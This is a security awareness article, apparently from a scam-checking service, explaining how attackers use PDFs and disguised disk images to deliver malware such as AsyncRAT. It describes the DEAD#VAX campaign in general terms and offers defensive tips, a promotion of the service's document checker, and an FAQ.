Why PDFs Are the Top Malware Delivery Format
PDFs are the most common file format used to deliver malware, according to Palo Alto Networks Unit 42 research. Attackers prefer PDFs because they are universally trusted, expected in business contexts, and capable of embedding executable content, links, and scripts that most recipients will not question.
ScamVerify™ tracks 74,032 malicious domains through URLhaus and 60,758 indicators of compromise through ThreatFox. A growing share of these threat indicators are connected to campaigns that begin with a malicious PDF delivered by email.
The DEAD#VAX Campaign: A Case Study
One of the most sophisticated PDF malware campaigns in recent years is DEAD#VAX, identified by security researchers at Securonix. This campaign demonstrates how far attackers have evolved beyond simple malicious attachments.
How DEAD#VAX Works
- The victim receives an email with an attached PDF that appears to be an invoice, shipping notification, or business document
- The PDF contains a link rather than embedded malware, bypassing many email security scanners
- Clicking the link downloads a virtual hard disk (VHD) file disguised as a PDF, using a double extension (e.g., "Invoice_March.pdf.vhd")
- Windows automatically mounts the VHD as a virtual drive when opened
- The mounted drive contains a shortcut file that executes a PowerShell script
- The script downloads and installs AsyncRAT, a remote access trojan that gives the attacker full control of the victim's computer
AsyncRAT allows attackers to:
- Record keystrokes to capture passwords and sensitive data
- Access files on the infected computer and connected network drives
- Control the webcam and microphone for surveillance
- Deploy additional malware including ransomware
- Exfiltrate data silently over extended periods
Why This Technique Evades Detection
| Defense | Why It Fails Against DEAD#VAX |
|---|---|
| Email attachment scanning | PDF itself contains no malware, only a link |
| URL filtering | Download link may be hosted on compromised legitimate site |
| File type blocking | VHD files are legitimate Windows disk images |
| Antivirus scanning | Payload is encrypted and downloaded in stages |
| User awareness | File appears to be a normal PDF invoice |
The multi-stage delivery chain means no single security tool sees the complete attack. Each stage appears benign in isolation.
Common PDF Malware Techniques in 2026
Embedded JavaScript
PDFs support embedded JavaScript that executes when the file is opened. While modern PDF readers disable JavaScript by default, many enterprise environments re-enable it for legitimate PDF functionality. Malicious JavaScript can:
- Redirect to phishing websites
- Download and execute files
- Exploit vulnerabilities in the PDF reader
Phishing Links Disguised as Buttons
The simplest and most common technique: a PDF with a professional design that includes a "View Invoice," "Download Statement," or "Verify Account" button. The button links to a malicious URL that either delivers malware or leads to a credential harvesting page.
Form-Based Data Collection
PDFs support interactive forms. Attackers create documents with fillable fields that submit data to attacker-controlled servers. The victim fills out what appears to be a legitimate form (tax document, application, verification) and sends their personal information directly to the attacker.
Encrypted PDFs With Password Bait
Attackers send a PDF protected with a password, then provide the password in the email body. This technique bypasses security scanners (which cannot open password-protected files) and makes the document feel more confidential and legitimate.
File Types That Disguise Malware as Documents
PDFs are not the only document format weaponized by attackers:
| File Type | Risk Level | Common Disguise |
|---|---|---|
| High | Invoices, receipts, contracts, shipping notices | |
| .docx (with macros) | High | Business proposals, HR documents, legal forms |
| .xlsx (with macros) | High | Financial reports, purchase orders, data exports |
| .html (as attachment) | Medium | "View in browser" redirects to phishing |
| .vhd/.iso | Medium | Mounted disk images containing executables |
| .zip/.rar | Medium | Compressed archives hiding executables |
How to Stay Safe From PDF Malware
1. Do Not Open Unexpected Attachments
If you receive a PDF you were not expecting, verify its legitimacy before opening. Contact the sender through a separate channel (phone call, separate email) to confirm they sent the document.
2. Disable JavaScript in Your PDF Reader
In Adobe Acrobat: Edit > Preferences > JavaScript > uncheck "Enable Acrobat JavaScript." In most cases, legitimate PDFs do not require JavaScript to function.
3. Use Preview Mode
Open PDFs in your operating system's built-in preview tool (Preview on macOS, Microsoft Edge PDF viewer on Windows) rather than full-featured PDF editors. Preview tools execute less embedded content and provide a safer viewing environment.
4. Watch for Double Extensions
Files with names like "Invoice.pdf.vhd" or "Contract.pdf.exe" are disguised executables. Windows hides known file extensions by default, so "Invoice.pdf.vhd" may appear as just "Invoice.pdf." Enable "Show file extensions" in your file manager settings.
5. Upload Suspicious Documents to ScamVerify
The ScamVerify document checker analyzes uploaded PDFs and images using AI. The analysis extracts all text content, identifies embedded phone numbers, email addresses, and URLs, then checks each entity against 8 million+ threat records. This catches documents that reference known malicious infrastructure even when the PDF itself does not contain malware.
Upload a document to analyze
Upload any PDF, image, or document to check for signs of fraud or manipulation.
Analyze DocumentThe Business Impact
PDF malware campaigns frequently target businesses because:
- Employees expect to receive PDFs (invoices, contracts, reports) as part of normal operations
- Business PDFs often require opening attachments rather than viewing in a browser
- A single infected workstation can provide access to the entire corporate network
- Business accounts and data are more valuable than individual consumer data
The FBI's Internet Crime Complaint Center reports billions in annual losses from attacks that begin with malicious document delivery, making document security a critical business concern.
FAQ
Can opening a PDF infect my computer?
On a fully updated system with modern PDF reader defaults, simply viewing a PDF is very low risk. The danger comes from clicking links within the PDF, enabling JavaScript execution, opening embedded files, or downloading additional files prompted by the PDF. Keep your software updated and avoid interacting with unexpected content within PDFs.
Is it safe to open PDFs in a web browser?
Generally safer than opening in a full PDF editor. Modern browsers (Chrome, Edge, Firefox) render PDFs in a sandboxed environment that limits the impact of any malicious content. However, phishing links within the PDF still work, so verify before clicking any link.
How does ScamVerify's document analysis work differently from antivirus?
Antivirus scans for known malware signatures within the file. ScamVerify's document analysis takes a different approach: it extracts the human-readable content (text, phone numbers, URLs, email addresses) and checks those entities against threat intelligence databases. This catches documents that are part of fraud schemes even when the PDF itself is technically clean.
What should I do if I already opened a suspicious PDF?
If you only viewed the PDF without clicking links or enabling macros, the risk is low on an updated system. If you clicked a link or downloaded additional files, disconnect from the internet, run a full antivirus scan, and change passwords for any accounts you accessed from that computer. Report the incident to your IT department if applicable.
